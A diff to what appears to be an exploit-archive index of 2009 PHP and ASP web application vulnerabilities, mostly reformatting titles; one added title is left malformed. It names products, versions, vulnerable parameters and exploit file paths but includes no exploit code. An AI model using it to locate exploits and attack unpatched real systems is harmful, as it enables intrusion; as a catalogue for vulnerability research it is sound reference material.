8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 -8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 +8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps,0 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 -8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 -8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 +8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload",2009-04-20,JosS,php,webapps,0 +8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - 'c' SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8487,platforms/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0 -8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 +8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - Insecure Cookie Handling Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0 -8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 -8495,platforms/php/webapps/8495.pl,"e107 < 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0 +8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - 'inc_dir' Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 +8495,platforms/php/webapps/8495.pl,"e107 < 0.7.15 - 'extended_user_fields' Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - 'whoisonline.php' PHP Code Injection",2009-04-21,EgiX,php,webapps,0 -8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 +8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - 'products_id' SQL Injection",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,php,webapps,0 @@ -21681,7 +21682,7 @@ id,file,description,date,author,platform,type,port 8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 -8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 +8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - 'order_sn' SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -21691,17 +21692,17 @@ id,file,description,date,author,platform,type,port 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - 'changePW.php' Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,php,webapps,0 -8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php id' SQL Injection",2009-04-29,snakespc,php,webapps,0 -8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php sn' SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 -8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 +8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,php,webapps,0 +8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 +8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0 -8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0 +8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0 8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 -8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - 'index.php language' Local File Inclusion",2009-05-01,SirGod,php,webapps,0 +8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - 'index.php?language' Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,asp,webapps,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - 'news_id' SQL Injection",2009-05-04,snakespc,php,webapps,0 @@ -21716,7 +21717,7 @@ id,file,description,date,author,platform,type,port 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,php,webapps,0 8619,platforms/php/webapps/8619.txt,"Joomla! Component Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps,0 -8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0 +8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - 'page' Blind SQL Injection",2009-05-07,DNX,php,webapps,0 8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps,0 @@ -21732,19 +21733,19 @@ id,file,description,date,author,platform,type,port 8652,platforms/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 -8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 +8655,platforms/php/webapps/8655.pl,"microTopic 1 - 'Rating' Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - 'saveFeed()' Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0 8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 -8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 +8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - 'script' Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 -8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 +8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - 'm_username' Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0 -8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - 'arch.php arch' Local File Inclusion",2009-05-14,Kacper,php,webapps,0 +8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - 'arch.php?arch' Local File Inclusion",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0 @@ -21761,9 +21762,9 @@ id,file,description,date,author,platform,type,port 8697,platforms/php/webapps/8697.txt,"Joomla! Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0 -8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 +8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design -(SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 -8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0 +8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 @@ -21795,10 +21796,10 @@ id,file,description,date,author,platform,type,port 8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 -8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - 'list_list.php id' SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 +8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - 'list_list.php?id' SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8749,platforms/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,asp,webapps,0 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 -8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 +8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - 'forumid' Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0 @@ -21820,9 +21821,9 @@ id,file,description,date,author,platform,type,port 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - 'vbplaza.php' Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 -8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 +8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php?user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 8790,platforms/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0 -8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 +8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - 'wp-lytebox' Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",php,webapps,0 @@ -21841,7 +21842,7 @@ id,file,description,date,author,platform,type,port 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla! Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - 'fiche' Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 -8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - (THEME_FOLDER) Local File Inclusion",2009-05-27,ahmadbady,php,webapps,0 +8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion",2009-05-27,ahmadbady,php,webapps,0 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - Cross-Site Scripting / SQL Injection",2009-05-29,YEnH4ckEr,php,webapps,0 @@ -21854,16 +21855,16 @@ id,file,description,date,author,platform,type,port 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 -8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 +8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - 'seller' SQL Injection",2009-06-01,Br0ly,php,webapps,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,php,webapps,0 -8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 +8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - 'tid' Blind SQL Injection",2009-06-01,OzX,php,webapps,0 8841,platforms/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injections",2009-06-01,YEnH4ckEr,php,webapps,0 8847,platforms/php/webapps/8847.txt,"Joomla! Component Joomlaequipment (com_juser) 2.0.4 - SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 -8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - 'article_view_photo.php id' SQL Injection",2009-06-01,taRentReXx,php,webapps,0 +8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - 'article_view_photo.php?id' SQL Injection",2009-06-01,taRentReXx,php,webapps,0 8849,platforms/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 @@ -21876,34 +21877,34 @@ id,file,description,date,author,platform,type,port 8858,platforms/php/webapps/8858.txt,"propertymax pro free - SQL Injection / Cross-Site Scripting",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 -8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 +8864,platforms/php/webapps/8864.txt,"My Mini Bill - 'orderid' SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0 8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 -8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - 'index.php noticia' SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 +8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - 'index.php?noticia' SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 8870,platforms/php/webapps/8870.txt,"Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,php,webapps,0 -8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - 'init.php anticode' Code Execution",2009-06-03,SirGod,php,webapps,0 +8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - 'init.php?anticode' Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla! Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",php,webapps,0 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8876,platforms/php/webapps/8876.htm,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,php,webapps,0 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 -8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0 +8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - 'idx' SQL Injection",2009-06-05,snakespc,php,webapps,0 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0 -8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (Delete Row) 'code' SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 -8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 +8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 +8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 -8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 +8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - 'classid' SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - 'category' SQL Injection",2009-06-08,OzX,php,webapps,0 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 -8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 +8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,php,webapps,0 8901,platforms/php/webapps/8901.txt,"virtue news - SQL Injection / Cross-Site Scripting",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 @@ -21911,13 +21912,13 @@ id,file,description,date,author,platform,type,port 8905,platforms/php/webapps/8905.txt,"Joomla! Component com_portafolio - 'cid' SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection",2009-06-08,Ams,php,webapps,0 8908,platforms/php/webapps/8908.txt,"Joomla! Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 -8911,platforms/php/webapps/8911.txt,"Joomla! Component Akobook 2.3 - (gbid) SQL Injection",2009-06-09,Ab1i,php,webapps,0 +8911,platforms/php/webapps/8911.txt,"Joomla! Component Akobook 2.3 - 'gbid' SQL Injection",2009-06-09,Ab1i,php,webapps,0 8912,platforms/php/webapps/8912.txt,"Joomla! Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8913,platforms/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusions",2009-06-09,YEnH4ckEr,php,webapps,0 8914,platforms/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,php,webapps,0 